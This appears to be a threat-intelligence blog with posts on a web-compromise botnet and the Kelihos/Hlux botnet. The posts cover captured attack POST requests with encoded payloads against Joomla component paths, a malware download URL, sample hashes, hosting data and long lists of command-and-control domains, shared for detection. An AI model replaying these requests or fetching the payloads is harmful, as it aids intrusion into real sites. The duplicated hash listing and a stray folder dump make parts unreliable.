POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php
HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: www.[redacted].org
Content-Length: 506 Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1
406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

3a. Linux20+cfcd208495d565ef66e7dff9f98764da (fail response to sm14e.php spam bot script ("die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));" ) on already compromised host, returns OS value followed by MD5 "0" . Other variants include

  • WINNT20+cfcd208495d565ef66e7dff9f98764da+6+([redacted]ston66@yahoo.com)+554
  • FreeBSD20+cfcd208495d565ef66e7dff9f98764da+1
  • Linux20+cfcd208495d565ef66e7dff9f98764da+1

POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Linux20+cfcd208495d565ef66e7dff9f98764da+4+([redacted]@gmail.com)+550-5.1.1 The email account that you tried to reach does not exist. Please try|550-5.1.1 double-checking the recipient's email address for typos or|550-5.1.1 unnecessary spaces. Learn more at|550 5.1.1 http://support.google.com/mail/bin/answer.py?answer=6596 x2si10031694eef.106 - gsmtp|



Hosting Infrastructure 


The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure


Domain IP Address ASN Network Name
wholists.org 95.163.104.69 AS12695 Digital Networks CJSC
gettrial.store-apps.org 95.163.104.94 AS12695 Digital Networks CJSC
t22.run-stat.org 95.163.104.69 AS12695 Digital Networks CJSC
seek4.run-stat.org 46.165.230.185 AS16265 Leaseweb
bt.ads-runner.org 208.115.109.53 AS23033 Wowrack
fw.point-up.org 85.143.166.221 AS56534 PIRIX-CORPNET-2


Passive DNS

95.163.104.69 95.163.104.94 46.165.230.185 208.115.109.5385.143.166.221
www.wholists.org ns1.wholists.org ns1.upsave.info ntp.run-stat.orgfw.point-up.org
bns.wholists.org ns1.store-apps.org fw.stat-run.info bt.ads-runner.orgns2.memrem.ru
gjd.wholists.org ns1.games-olympic.org fw.run-stat.org sk4.ads-runner.orgns2.nalkanet.ru
lbh.wholists.org ns1.googleminiapi.com mail.stat-run.info ntp.stat-run.infons2.nallanite.ru
qdp.wholists.org peace.vijproject.com bt2.run-stat.org
vm.clodoserver.ru
www.techsign.org sogood.vitaminavip.com jc.upsave.info

ml.inviteyou.info img.stat-run.info ju.upsave.info


Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.  

95.163.104.69 &  95.163.104.94- ASN12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013














In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.

AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack



Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013













For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2


Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013
















In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534


Monday, May 6, 2013

Library of Malware Traffic Patterns


Img: ''Harry Potter and the Sorcerer's Stone (movie)''Update May 6, 2013 We added ability to download corresponding samples and pcaps (when available). Same password scheme as contagio. Email Mila if needed.

Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize  malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.


This list is not meant to be the only way to identify malware families - it is an aid resource and reference. We will be adding data from our own research and online publications. (hint: please send us links to add)

The references column is a good source of links for malware analysis or resources for different families. The second tab "EZ Lookup" offers a more condensed view, which allows easier sorting. The Links tab gives resource list, and TBD tab shows entries for malware for which we don't have common/public names. The list features all types of malware: cybercrime, APT and hacktivism

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS" SPREADSHEET 


To download (you might miss updates if you decide to use a static copy), click on File - Download As in the spreadsheet view. To sort any columns, click on View - List. Your sorting will not affect other visitors.  


If you think you can and wish to contribute, or have any comments or corrections please email Andre' or Mila

Monday, February 25, 2013

Yara Resources





Yara Project by Víctor Manuel Álvarez   

Yara Exchange Google Group - exchange yara signatures, tools, resources, and ideas. 170+ members as of Feb.2013





Notable Yara related publications by date:

Sunday, February 10, 2013

Trojan Nap aka Kelihos/Hlux - Feb. 2013 Status Update



Update Feb 11, 2012 Regarding media headlines that it is a "new version": 
Please note that this post is a "status update" on the growth of the  Kelihos botnet. It is the same botnet and malware as we saw last year. The goal of the post is to highlight the rapid re-growth after the March 2012 takedown and share the recent known domain/name server data.

 FireEye posted details about the sleep function found in Kelihos/Hlux (An encounter with Trojan Nap), which is interesting, and indeed is present in some of the samples we saw. The trojan, of course, has many more features, and most of them were documented in previous publications online. This post is a quick update on the state of Kelihos/Hlux botnet, along with  the list of known fast flux domains (1500+) associated with with Kelihos distribution or Command&Control. (current > 2012).  The current and most active name servers are pointing to the ns[1-6].boomsco.com, ns[1-6].larstor.com, and ns[1-6].zempakiv.ru which are also fast flux domains. The double fast flux nature of the botnet makes it very difficult to take down, and sinkholing is a temporary measure. Despite the two large attempts to take it down (Sep.2011 and Mar. 2012), the botnet is definitely on the rise again. 

Previously published research about Kelihos

Jan. 2013 - Beware of Kelihos-2? - Portable Apps member note

List of  recent MD5 hashes (you can download this sample set from Contagio. There are 95 files). 

01B43C0C8D620E8B88D846E4C9287CCD 036ADB0D4B856C2A5E16175BD089FF24 03F3B93A9B3D70D9BB9AD829A5F2361D 0481B4B12C8C69B735CAC2A918B52790 0530898731D7165DBABBF6BF252BA77E 08862142D7313A1D431D67E0E755EFC7 093586512549F2D016AD4C70F4F8E5C8 0BF067750C7406CF3373525DD09C293C 0C921935F0880B5C2161B3905F8A3069 0FEAAA4ADC31728E54B006AB9A7E6AFA 15B6DFADD045E8282C4927F8BDD69D3E 15B9C9632510FB4D387D4A02ABF830DD 1B342E6682167571B55AB59F3DD38D1E 1C04C6B4E0BBBC99CCEE489270C98622 1E08449CE5848B6ADFEE48B1582EAEEF
223D32E3F6BB9C5A6AD3CD58B898EFA1 223F7E425BD28AE13A54B2D0017D1E81 22AE2A6FF14C58265B5C79FBC25A91B6 2304FA9A6A67984CA0FF9E9BF561817A 23585DCBA9DFD4719ECC20B2D662D983 25B4C1C68C58D7D559E8682117D7C01F 288E85A4A7756268EBDED1F356531E03 28A417B0EA5BE796720463607F06CCC9 2B4A5F1C8225D9043AE1302DCCD7063B 2F091B59382F6CA9E1233EE38B171B2E 30EA180ECE416600DABC5ADA0F630D06 352A8AB0D5C7DB40F865B0E7E03B1D96 36C90E73120A419B4B00E66177040F43 3774D5BD50F4286531FEDF716D83FC6E 396B88D48CC04A8C37F4409F65EA8A97 3A76AA2439112479635D7172DB2440B1 3B6A3354B71CD674D4BC27646D270502 3D0F09DA5C5DBDB2124AEB0953F355B7 3D711B47C8FDE2C6A5E62D6AD0BA7BB5 44B342383E286465D74A838EE0780DDA 49B6D19F9307C3BBA460C936ADE26B70 4B6DFE2A4B0EF515275AC84B378D5F6F 4C2DB57ED5D27F54120765A9FA9C3BC7 51D3E04AF7E29A1E3A1748E03F0BD578 56AD23082E5E73AAEB95E5A915DF5444 5ACA74320003576F79CF6EDD0629CC13 5B947FEAA5BFA951C94B11BB9EEA9BC3 5BA7D2DE0CCC58F104240610BF297E6E 5BECB2498EA801ED010DD073007E20CE 5FFE38CA9FE07394D1BC5C270E83B253 63C926F659C3EDEC0B85C91898622A4D 69170C0C9FB4EEC6A630C4C9182505F0 6AA100C459E854A9A334B10468EAD014 6B873B6D21ECC9ADF7246D644B23FB84 6F6B016A5DB1791188D7C98A464292CC 70FD6A11E482D756BEF27546AA112206 72C1BEC266B23AF5CB12AE2F669D8784 7316D0EE9C0B6C23C7CEB2D04DC6B665 766A50581F6E47FF94126C5DBBD9FB01 76B7BB0CC2E3623078BF9E9A9A343CE1 77E2D2A1E508EA30D548293E2C36D64F 787F39D70D2BEC3139A6EA7690B88464 7E1B91800F2FE9974C7BB18A7097D933 7F7E0C58BDF1E47059DD84FFB301F6B7 8005E44761B842370D43299B29B0F16A 80E595253D3E02071D2564BA8296D308 84741D6DFFC996D35B8DC0A01111A5DE 9010DD12A1419E0F0098FD10CA324E23 9424EB9DE0558193A6B4D9607C23CBD5 9C075FB471DC66394090C8BFAA4739A4 9CA42C5B352DEFB53F8D30C16B36697A A13B21423C5AE7BA318D0D26E672AD22 A15F02836309B819DE10068ED49D5D87 A56577564E52251C54B27D4CA62C266F A78BE2345E524515E0DD1CCCA3C524F9 A8ABECD7C571AAEE6C964514133585F3 A910A324394B56022C7AC10DB22EC3F6 B1ABD1279A28F22B86A15D6DAFBC28A5 B568CF0982C867CD499F953E43738511 B63F25D5B02FE00D9423A7CCC0C3CCE2 B66475ED30943C0056C9402DCAECB8B9 BB5560123C62588988BC22C704CD9E03 C06414E1994BF4EFA41911CA81099411 C465888536A6785883079043F38143BD C98F3F5709292D6D97AD96C1A8459A81 CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94 CCA50DCB8A30B325BF10CED5DAE4D51A CE391D2B2036365D8943257FE1CB967E D4CBEABAE5B4D4BAF14F554C8E9A4E86 DCE41A00FB703B6A6324CE4F4C4DB143 DE5FDBAD9274B21EA5391F48441D33D8 DEAF70F248599985FC32B083F16F251A DF1A932144BF2C6E50FD090FDC1F1408 DFE01E12671BBDD7EC0F8BEBA08EC440 E2F8F5C80566BF32E1841B3C5A669D42 E453463A428A71A5DB19FC18807E747B EB17EB2F02FA871C005C569B3299FCBA EB4DBB18D00321A809A6C4D8594DDF5A F5A6FC81A4F5AE6DEBFAC463DD49E1C2 F604C7E4EC3A12A83E0852A9D7FE75CA F96EBF8128BFC6965C73A2659718C663 FE501F12B34701CF8AF5DD307C314862

List of files  sorted by PE header Time Date stamp. It is not always indicative of age (and in this case all samples are recent -2013-2012) as the time stamp can be faked but can be helpful for finding variants.


1985-12
      84741D6DFFC996D35B8DC0A01111A5DE
   
2009
      23585DCBA9DFD4719ECC20B2D662D983
      A78BE2345E524515E0DD1CCCA3C524F9
   
2010-01
      03F3B93A9B3D70D9BB9AD829A5F2361D
      787F39D70D2BEC3139A6EA7690B88464
   
2010-02
      5B947FEAA5BFA951C94B11BB9EEA9BC3
   
2010-03
      288E85A4A7756268EBDED1F356531E03
   
2010-04
      0530898731D7165DBABBF6BF252BA77E
      15B6DFADD045E8282C4927F8BDD69D3E
   
2010-05
      B568CF0982C867CD499F953E43738511
      C465888536A6785883079043F38143BD
      CE391D2B2036365D8943257FE1CB967E
   
2010-06
      036ADB0D4B856C2A5E16175BD089FF24
      28A417B0EA5BE796720463607F06CCC9
   
2010-07
      51D3E04AF7E29A1E3A1748E03F0BD578
      70FD6A11E482D756BEF27546AA112206
      76B7BB0CC2E3623078BF9E9A9A343CE1
   
2010-11
      3D0F09DA5C5DBDB2124AEB0953F355B7
   
2010-12
      0FEAAA4ADC31728E54B006AB9A7E6AFA
   
2011-01
      9424EB9DE0558193A6B4D9607C23CBD5
      DFE01E12671BBDD7EC0F8BEBA08EC440
   
2011-02
      352A8AB0D5C7DB40F865B0E7E03B1D96
      BB5560123C62588988BC22C704CD9E03
   
2011-04
      D4CBEABAE5B4D4BAF14F554C8E9A4E86
   
2011-05
      1E08449CE5848B6ADFEE48B1582EAEEF
      B63F25D5B02FE00D9423A7CCC0C3CCE2
      C98F3F5709292D6D97AD96C1A8459A81
   
2011-07
      B66475ED30943C0056C9402DCAECB8B9
   
2011-08
      7F7E0C58BDF1E47059DD84FFB301F6B7
      DCE41A00FB703B6A6324CE4F4C4DB143
      F604C7E4EC3A12A83E0852A9D7FE75CA
   
2011-09
      396B88D48CC04A8C37F4409F65EA8A97
      72C1BEC266B23AF5CB12AE2F669D8784
      77E2D2A1E508EA30D548293E2C36D64F
      9C075FB471DC66394090C8BFAA4739A4
      C06414E1994BF4EFA41911CA81099411
      DF1A932144BF2C6E50FD090FDC1F1408
   
2011-10
      0C921935F0880B5C2161B3905F8A3069
      3D711B47C8FDE2C6A5E62D6AD0BA7BB5
      5ACA74320003576F79CF6EDD0629CC13
   
2011-11
      2B4A5F1C8225D9043AE1302DCCD7063B
      3774D5BD50F4286531FEDF716D83FC6E
      5BA7D2DE0CCC58F104240610BF297E6E
      9CA42C5B352DEFB53F8D30C16B36697A
   
2011-12
      E2F8F5C80566BF32E1841B3C5A669D42
   
2012-01
      F96EBF8128BFC6965C73A2659718C663
   
2012-02
      6F6B016A5DB1791188D7C98A464292CC
   
2012-03
      093586512549F2D016AD4C70F4F8E5C8
   
2012-04
      80E595253D3E02071D2564BA8296D308
   
2012-06
      08862142D7313A1D431D67E0E755EFC7
      223D32E3F6BB9C5A6AD3CD58B898EFA1
      5BECB2498EA801ED010DD073007E20CE
      5FFE38CA9FE07394D1BC5C270E83B253
      A910A324394B56022C7AC10DB22EC3F6
   
2012-07
      3B6A3354B71CD674D4BC27646D270502
      4C2DB57ED5D27F54120765A9FA9C3BC7
   
2012-08
      2304FA9A6A67984CA0FF9E9BF561817A
      7316D0EE9C0B6C23C7CEB2D04DC6B665
      EB4DBB18D00321A809A6C4D8594DDF5A
   
2012-10
      25B4C1C68C58D7D559E8682117D7C01F
      63C926F659C3EDEC0B85C91898622A4D
      6AA100C459E854A9A334B10468EAD014
      8005E44761B842370D43299B29B0F16A
      B1ABD1279A28F22B86A15D6DAFBC28A5
      DEAF70F248599985FC32B083F16F251A
   
2012-11
      766A50581F6E47FF94126C5DBBD9FB01
   
2012-12
      01B43C0C8D620E8B88D846E4C9287CCD
      15B9C9632510FB4D387D4A02ABF830DD
      1B342E6682167571B55AB59F3DD38D1E
      1C04C6B4E0BBBC99CCEE489270C98622
      30EA180ECE416600DABC5ADA0F630D06
      36C90E73120A419B4B00E66177040F43
      3A76AA2439112479635D7172DB2440B1
      44B342383E286465D74A838EE0780DDA
      56AD23082E5E73AAEB95E5A915DF5444
      69170C0C9FB4EEC6A630C4C9182505F0
      6B873B6D21ECC9ADF7246D644B23FB84
      7E1B91800F2FE9974C7BB18A7097D933
      9010DD12A1419E0F0098FD10CA324E23
      A15F02836309B819DE10068ED49D5D87
      A56577564E52251C54B27D4CA62C266F
      A8ABECD7C571AAEE6C964514133585F3
      CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94
      DE5FDBAD9274B21EA5391F48441D33D8
      EB17EB2F02FA871C005C569B3299FCBA
      F5A6FC81A4F5AE6DEBFAC463DD49E1C2
   
2013-01
      0481B4B12C8C69B735CAC2A918B52790
      223F7E425BD28AE13A54B2D0017D1E81
      2F091B59382F6CA9E1233EE38B171B2E
      49B6D19F9307C3BBA460C936ADE26B70
      A13B21423C5AE7BA318D0D26E672AD22
      CCA50DCB8A30B325BF10CED5DAE4D51A
      E453463A428A71A5DB19FC18807E747B
   
ÀÄÄÄ2013-02
        4B6DFE2A4B0EF515275AC84B378D5F6F
     
Folder PATH listing
Volume serial number is 40A1-15F9
C:\USERS\ADMIN\DESKTOP\ALL
³   log.txt
³
1985-12
      84741D6DFFC996D35B8DC0A01111A5DE
   
2009
      23585DCBA9DFD4719ECC20B2D662D983
      A78BE2345E524515E0DD1CCCA3C524F9
   
2010-01
      03F3B93A9B3D70D9BB9AD829A5F2361D
      787F39D70D2BEC3139A6EA7690B88464
   
2010-02
      5B947FEAA5BFA951C94B11BB9EEA9BC3
   
2010-03
      288E85A4A7756268EBDED1F356531E03
   
2010-04
      0530898731D7165DBABBF6BF252BA77E
      15B6DFADD045E8282C4927F8BDD69D3E
   
2010-05
      B568CF0982C867CD499F953E43738511
      C465888536A6785883079043F38143BD
      CE391D2B2036365D8943257FE1CB967E
   
2010-06
      036ADB0D4B856C2A5E16175BD089FF24
      28A417B0EA5BE796720463607F06CCC9
   
2010-07
      51D3E04AF7E29A1E3A1748E03F0BD578
      70FD6A11E482D756BEF27546AA112206
      76B7BB0CC2E3623078BF9E9A9A343CE1
   
2010-11
      3D0F09DA5C5DBDB2124AEB0953F355B7
   
2010-12
      0FEAAA4ADC31728E54B006AB9A7E6AFA
   
2011-01
      9424EB9DE0558193A6B4D9607C23CBD5
      DFE01E12671BBDD7EC0F8BEBA08EC440
   
2011-02
      352A8AB0D5C7DB40F865B0E7E03B1D96
      BB5560123C62588988BC22C704CD9E03
   
2011-04
      D4CBEABAE5B4D4BAF14F554C8E9A4E86
   
2011-05
      1E08449CE5848B6ADFEE48B1582EAEEF
      B63F25D5B02FE00D9423A7CCC0C3CCE2
      C98F3F5709292D6D97AD96C1A8459A81
   
2011-07
      B66475ED30943C0056C9402DCAECB8B9
   
2011-08
      7F7E0C58BDF1E47059DD84FFB301F6B7
      DCE41A00FB703B6A6324CE4F4C4DB143
      F604C7E4EC3A12A83E0852A9D7FE75CA
   
2011-09
      396B88D48CC04A8C37F4409F65EA8A97
      72C1BEC266B23AF5CB12AE2F669D8784
      77E2D2A1E508EA30D548293E2C36D64F
      9C075FB471DC66394090C8BFAA4739A4
      C06414E1994BF4EFA41911CA81099411
      DF1A932144BF2C6E50FD090FDC1F1408
   
2011-10
      0C921935F0880B5C2161B3905F8A3069
      3D711B47C8FDE2C6A5E62D6AD0BA7BB5
      5ACA74320003576F79CF6EDD0629CC13
   
2011-11
      2B4A5F1C8225D9043AE1302DCCD7063B
      3774D5BD50F4286531FEDF716D83FC6E
      5BA7D2DE0CCC58F104240610BF297E6E
      9CA42C5B352DEFB53F8D30C16B36697A
   
2011-12
      E2F8F5C80566BF32E1841B3C5A669D42
   
2012-01
      F96EBF8128BFC6965C73A2659718C663
   
2012-02
      6F6B016A5DB1791188D7C98A464292CC
   
2012-03
      093586512549F2D016AD4C70F4F8E5C8
   
2012-04
      80E595253D3E02071D2564BA8296D308
   
2012-06
      08862142D7313A1D431D67E0E755EFC7
      223D32E3F6BB9C5A6AD3CD58B898EFA1
      5BECB2498EA801ED010DD073007E20CE
      5FFE38CA9FE07394D1BC5C270E83B253
      A910A324394B56022C7AC10DB22EC3F6
   
2012-07
      3B6A3354B71CD674D4BC27646D270502
      4C2DB57ED5D27F54120765A9FA9C3BC7
   
2012-08
      2304FA9A6A67984CA0FF9E9BF561817A
      7316D0EE9C0B6C23C7CEB2D04DC6B665
      EB4DBB18D00321A809A6C4D8594DDF5A
   
2012-10
      25B4C1C68C58D7D559E8682117D7C01F
      63C926F659C3EDEC0B85C91898622A4D
      6AA100C459E854A9A334B10468EAD014
      8005E44761B842370D43299B29B0F16A
      B1ABD1279A28F22B86A15D6DAFBC28A5
      DEAF70F248599985FC32B083F16F251A
   
2012-11
      766A50581F6E47FF94126C5DBBD9FB01
   
2012-12
      01B43C0C8D620E8B88D846E4C9287CCD
      15B9C9632510FB4D387D4A02ABF830DD
      1B342E6682167571B55AB59F3DD38D1E
      1C04C6B4E0BBBC99CCEE489270C98622
      30EA180ECE416600DABC5ADA0F630D06
      36C90E73120A419B4B00E66177040F43
      3A76AA2439112479635D7172DB2440B1
      44B342383E286465D74A838EE0780DDA
      56AD23082E5E73AAEB95E5A915DF5444
      69170C0C9FB4EEC6A630C4C9182505F0
      6B873B6D21ECC9ADF7246D644B23FB84
      7E1B91800F2FE9974C7BB18A7097D933
      9010DD12A1419E0F0098FD10CA324E23
      A15F02836309B819DE10068ED49D5D87
      A56577564E52251C54B27D4CA62C266F
      A8ABECD7C571AAEE6C964514133585F3
      CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94
      DE5FDBAD9274B21EA5391F48441D33D8
      EB17EB2F02FA871C005C569B3299FCBA
      F5A6FC81A4F5AE6DEBFAC463DD49E1C2
   
2013-01
      0481B4B12C8C69B735CAC2A918B52790
      223F7E425BD28AE13A54B2D0017D1E81
      2F091B59382F6CA9E1233EE38B171B2E
      49B6D19F9307C3BBA460C936ADE26B70
      A13B21423C5AE7BA318D0D26E672AD22
      CCA50DCB8A30B325BF10CED5DAE4D51A
      E453463A428A71A5DB19FC18807E747B
   
2013-02
      4B6DFE2A4B0EF515275AC84B378D5F6F
   
09-2020
      22AE2A6FF14C58265B5C79FBC25A91B6
     
    
Some of the domains we saw from the binaries above: (see the full list of associated domains below)
akpuxqaz.ru
apnifosa.ru
bugfivin.ru 
cagremub.ru
diqnawug.ru
dufyhive.ru
jiwviqpa.ru
merwiqca.ru
wowrizep.ru

Traffic information
GET /instcod.exe HTTP/1.0
Host: wowrizep.ru
HTTP/1.1 200 Ok
Server: Apache
Content-Length: 785920
Content-Type: application/octet-stream
Last-Modified: .., 06 ... 2013 13:47:52 GMT
Accept-Ranges:
bytes
MZ......................@...................................|...........!..L.!..This program must be run under Win32Domains associated with Kelihos distribution and CnC

The http request is still incomplete in this example (as described here http://www.abuse.ch/?p=3658)
URL:  http://wowrizep.ru/instcod.exe
TYPE: GET
UA:   None
URL:  http://jiwviqpa.ru/instcod.exe
TYPE: GET
wowrizep.ru
nserver:       ns2.larstor.com.  (other name servers listed below)nserver:       ns3.larstor.com.nserver:       ns4.larstor.com.nserver:        ns5.larstor.com. nserver:        ns6.larstor.com. state:          REGISTERED, NOT DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.12.22
paid-till:     2013.12.22 free-date:     2014.01.22

Over 6 hours one infected machine had communications with over 1550 peers (unique IPs). Traffic  flow shown from our sandbox IP in San Francisco, CA



Known domains associated with Kelihos/Hlux distribution and command&control servers (Feb. 2013-2012)


Hundreds of domains pointing to these name servers are listed below as one list. If you see ".com" in the list, this is a name sever and is where the next batch of domains begins. You should see  batches for these name servers (1500+) that are associated with Redkit, Blackhole and other exploit kits mostly delivering Kelihos/Hlux and sometimes Virut, that has been associated with this botnet as well (Jan.  2013 - Waledac Gets Cozy with Virut - Symantec).  Some domains were moved to new name servers as the old ones were suspended. (for example, many domains were moved from ns[1-6].systeat.com to ns[1-6].turbusy.com.

Compare it to the usage of eu domains from the last year here http://www.abuse.ch/?p=3658.

RU domains

  • ns[1-6].boomsco.com  - domains registered on 2013-01-13  << most active now
  • ns[1-6].larstor.com - domains registered on 2012-12-22 << most active now 
  • ns[1-6].berchae.com (suspended) - domains registered on 2012-12-21
  • ns[1-6].zempakiv.ru - domains registered on 2012.12.07 << most active now 
  • ns[1-6].newrect.com - domains registered on 2012-08-01 
  • ns[1-6].turbusy.com - domains registered on 2012-12-07 
  • ns[1-6].chokode.com (suspended) - domains registered on 2012-09-06 
  • ns[1-6].biocruc.com (suspended) - domains registered on 2012-07-15 
  • ns[1-6].systeat.com  (suspended) - domains registered on 2012-07-07 
  • ns[1-6].affour.com (suspended) -  domains registered on 2012-06-29
  • ns[1-6].reetsp.com (suspended) -  domains registered on 2012-06-29
  • ns[1-6].oparle.com  -  domains registered on 2012-06-05 
  • ns[1-6].toastop.com (suspended) - domains registered on 2012-05-27
  • ns[1-6].ocorti.com  (suspended) - domains registered on 2012-04-21
  • ns[1-6].esanty.com  (suspended) - domains registered on 2012-04-09
  • ns[1-6].diastr.com (suspended) - domains registered on 2012-04-09
  • ns[1-6].snapoli.com (suspended) - domains registered on 2012-04-02
  • ns[1-6].maguiso.com  (suspended) - domains registered on 2012-03-05
  • ns[1-6].swartra.com - domains registered on 2011-10-12
EU domains
  • ns[1-6].frostli.com  (suspended) - domains registered on 2012-04-21
  • ns[1-6].pizzebu.com   (suspended) - domains registered on 2012-01-13
IN domains
  • ns[1-6].firstara.com - domains registered on 2012-3-8
CE.MS domains (used before 2012)
  • ns[1-6].roblect.com - domains registered on 2011-12-01
  • ns[1-6].galloma.com - domains registered on 2011-10-31
Domain list
All known domains sorted by the name server and age (newest on top - see the name server registration dates on top)  If you see any machines connecting to any of these domains, it is likely be infected.  Listed by nameservers and NS create date. There is some duplicates in the list as same domain could move from one NS to another.

Download:
http://files.deependresearch.org/logs/activeNS-kelihos-feb2013.txt - txt file with 430+ domains using currently active name servers = > for active defense
boomsco.com
larstor.com
zempakiv.ru
newrect.com
turbusy.com

http://files.deependresearch.org/logs/all-known-domains-kelihos-2012-2013.txt - txt file with all 1550+ known to us Kelihos domains including suspended and sinkholed (2013-2011). Sorted by age (newest-oldest) = for DNS monitoring and research.

 There are 1550+ unique domains.
ns[1-6].boomsco.com
aggeymin.ru
amxylkap.ru
aqqajofi.ru
asyknika.ru
bojsedyt.ru
cevlyxaq.ru
copapjid.ru
cujemjev.ru
dikojnah.ru
dobikuwe.ru
dubfoluc.ru
dyrzaqfu.ru
dyxketam.ru
egygumlo.ru
fachejyp.ru
favickov.ru
fycedqek.ru
fytfotlo.ru
giffunri.ru
gishabet.ru
guqyvzap.ru
gybebeho.ru
gyvolnac.ru
icepijog.ru
iszivkyc.ru
jiyknuqi.ru
linyaqor.ru
lisybsij.ru
lyfqekow.ru
nebgisyk.ru
ojvectyk.ru
olsicwiq.ru
owideker.ru
pahfyhfi.ru
papcybop.ru
pecunvom.ru
pegarpem.ru
pipuwbap.ru
pusycqyz.ru
qatuhnaf.ru
qiqwoxki.ru
qysmahku.ru
